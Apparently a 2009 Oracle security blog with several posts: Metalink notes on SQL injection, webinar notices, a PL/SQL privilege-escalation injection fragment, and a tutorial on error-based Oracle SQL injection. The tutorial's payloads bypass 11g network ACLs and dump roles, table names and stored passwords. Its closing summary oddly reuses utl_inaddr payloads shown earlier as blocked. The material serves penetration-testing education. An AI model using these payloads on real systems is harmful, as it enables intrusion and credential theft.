SQL Injection Notes in Oracle Metalink (updated)

29 Jan 2009 von Alexander Kornbrust.

4 years ago I published an article about “Metalink Hacking“.

Today I was looking again in Metalink for the search string “SQL Injection” and I found 2 interesting notes in Oracle’s knowledge base.
———–
Doc ID:     455801.1 - Updated 29-Jan-2009
DBTableOraDataSourceLoginModule Based Custom Login Module Has Faulty SQL Injection Detection

Applies to:
Oracle Containers for J2EE - Version: 10.1.3.0.0 to 10.1.3.3.0
This problem can occur on any platform.
Users with the characters “OR”/”or” in their name are not able to connect to the database.

The note mentions also an unpublished bug
5645982 -  - AUTHENTICATION FAILS FOR USERNAME CONTAINING “OR”, “UPDATE”, “DELETE”, ETC.
Interesting approach from Oracle. Just filter all reserved words to avoid SQL Injection. To bad for me that ALEXANDER contains the reserved word AND  and KORNBRUST the reserved word OR. Double whammy…

The good news is that Oracle has a patch for this problem.

1. Download and apply Patch 5645982 to a 10.1.3.3 installation
2. Restart the OC4J instance

I recommend a blog entry “Can you spell…” from Oracle Guru Tom Kyte…

———–

Second finding in Metalink was an exploit in the CMS from Stellent (aka Oracle Universal Content Management), aquired by Oracle in 2007. Publishing exploits with customer URLs is a bad style…

———–

Note 733017.1  from October 2008 says:
Version 6.2 of the Content Server has an SQL injection vulnerability.

Oracle was so nice to publish the exploit pointing to a customer site.

Scurity consultant report states:

Severity: 5
Port: 80
Name: SQL injection
Description: “An SQL injection vulnerability was identified in the following page:
http://customer.site/****&dID=1%20and%20convert
(varchar.(select%20@@version))=1

The back-end version return was ‘Microsoft SQL Server 2000 -8′</blockquote>”

– Business Impact:
Potential security threat

Cause
This is a known bug/issue with 7.5 and prior. (internal bug p51038621)

———————————–

Good to know that SQL Injection is just a potential security threat…

UPDATE:
Oracle removed note 733017.1 from Metalink.

Geschrieben in SQL Injection, Oracle Security | Drucken | 1 Kommentar »

Webinar Presentation “Best practises for Database Security” uploaded

28 Jan 2009 von Alexander Kornbrust.

I just uploaded the webinar presentation “Best practises for Database Security” from today to our website. All other presentations from us are available here.

The entire webinar with sound and video and the slides from Dan will be available on the Sentrigo website within the next few days.  Older webinars, e.g. from Pete Finnigan are already available there.

Geschrieben in Sentrigo, Oracle Security | Drucken | Keine Kommentare »

Webinar - Best Practices for Database Security

21 Jan 2009 von Alexander Kornbrust.

Next Wednesday, 28. January 2009 (10:00 AM - 11:00 AM CET), I will give a free webinar  “Best Practices for Database Security” together with Sentrigo.

I will talk about typical problems in Oracle databases and how to avoid them…

See you next week…

Geschrieben in Sentrigo, Oracle Security | Drucken | Keine Kommentare »

Exploit for January CPU 2009 published

21 Jan 2009 von Alexander Kornbrust.

Alexandr Polyakov, an Oracle security expert from Russia (reported findings in CPUJan2008, CPUJul2008 ), has posted details from one of his Oracle 11g findings on the webpage of dsecrg.com. 

By using the following PLSQL fragment

exec EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS(’EXFSYS’,'EXF$VERSION’,'EXFVER
SION’,'YYYYYYY” and 1=EVILPROC()–’)

it is possible to  escalate privileges via SQL Injection. More details (e.g. extract from v$sql) can be found in their advisory.

Other advisories for the January 2009 CPU cover other Oracle Products like BEA Application Server, Oracle E-Business Suite and

• Oracle EBusiness Suite Sensitive Information Disclosure Vulnerability
• Oracle Containers For Java Directory Traversal (OC4J) Oracle Application Server 10g (10.1.3.1.0) Oracle HTTP Server
•  Oracle BEA Weblogic 10 - Multiple Linked XSS vulnerabilities 
• Oracle Application Server (SOA) - Linked XSS vulnerability 

Geschrieben in Oracle Security | Drucken | Keine Kommentare »

Tutorial: Oracle SQL Injection in Webapps - Part I

17 Jan 2009 von Alexander Kornbrust.

This blog entry will show a SQL Injection example based on a JSP application (tnx to Slavik) and Oracle 11.1.0.7. An Oracle SQL Injection Cheat Sheet is available on our webpage.

With Oracle 11g, Oracle introduced some  security enhancements by default, e.g. the ACL for PLSQL packages accessing the network. These packages are UTL_HTTP, UTL_INADDR, UTL_TCP, … Some old well known tricks like the usage of utl_inaddr are no longer working for non-DBAs in 11g… The following tutorial will show how to bypass these restrictions and will show some new tricks…

First we start with with a vulnerable webapp:

In this webapp we can login to an employee directory. If we try to guess a valid combination, e.g. scott / tiger we are getting an error message

OK, let’s try to use a single quote ‘ as a user login. And BANG - ERROR

“ORA-01756 - Anführungsstrich fehlt bei Zeichenfolge”.

If you do not speak german, you can lookup in google for the english translation of this error message. This is not uncommon to receive an error message in a foreign language (if you work internationally).

There are several website so I take the first finding. The translation is “ORA-01756: quoted string not properly terminated”. This is a  common error message of a SQL Injection vulnerability.

A typical SQL Injection string is

‘ or 1=1–

If we use this string, we are getting the following result:

By using ‘ or 1=1– we successfully logged on into the system. But we are interested in the data not in the account of the webapp.

We are able to inject our own code. This page does not return data from the database so the usage of UNION SELECT is not an option.

But what are now the next steps?

1. Enumeration of the database:
Let’s find out the version number of the Oracle database:

Now we try to inject the following command in the login field

‘ or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))–

Again an ORA-01756 error. This time it is a different problem. The field for the login  is limited to 50 characters but our string we are injecting is longer. That’s why we are converting the POSTs to GETs.
The webdeveloper plugin for firefox can do this (+ many other different ways like saving the webpage locally, removing restrictions online, …).

After doing the conversion from POSTs to GETs we can modify the injected string in the URL:

Again we are getting a german error message:
ORA-24247 Netzwerkzugriff von Access Control List (ACL) abgelehnt.

A quick lookup shows the english translation:

ORA-24247  network access denied by access control list (ACL)

OK, the default hardening from Oracle is working. We are not able to send information via DNS or create a specially crafted error message using utl_inaddr.

I was looking for an alternative and I found the following function :
ctxsys.drithsx.sn

So we replace utl_inaddr with ctxsys.drithsx.sn (+ and one additional parameter).

Our new injection is looks like:

‘ or 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))–

After injection this we are getting the following error message

ORA-20000: Oracle Text-Fehler
DRG-11701: Thesaurus Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production ist nicht vorhanden

The error message contains the Database version. The reason for this behaviour is our injected string contains the result of the query  (select banner from v$version where rownum=1) in the error message. This query returns the first row of v$version.

Injecting error messages is normally limited to 1 column and 1 row. The limitation of 1 column can be bypassed using the string concatenation || (col1||col2). To bypass the limitation of multiple rows, most pentesters enumerate through the various columns using the  rownum.

But Oracle 11g offers a new function: stragg

This functions can convert multiple rows into a single row. In one of the next tutorial I will show how to do this in Oracle 9 and 10.  We can now use the function stragg to get all columns in the error message:

‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)||’ ‘ from v$version))–

Now we have everything to retrieve all data (according to our privileges) from the database

Let’s see what privileges we have

‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct granted_role||’;') from user_role_privs))–

We have CONNECT and RESOURCE role.

The next step is to get all tables with a password column:

‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct owner||’.'||table_name||’['||data_type||’];’) from all_tab_columns where column_name=’PASSWORD’))–

There is a table called SHOP.SHOPUSER. We are now using the following command to extract all passwords from this table.

‘ or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct password||’;') from shop.shopuser))–

Using this approach we can retrieve all table content without using UNION SELECT from the table.

SUMMARY of the used injected commands:

‘ or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))–

‘ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct granted_role||’;') from user_role_privs))–

‘ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct owner||’.'||table_name||’['||data_type||’];’) from all_tab_columns where column_name=’PASSWORD’))–

‘ or 1=utl_inaddr.get_host_address((select sys.stragg(distinct password||’;') from shop.shopuser))–

Geschrieben in Tutorial, 11g, Oracle Security | Drucken | 3 Kommentare »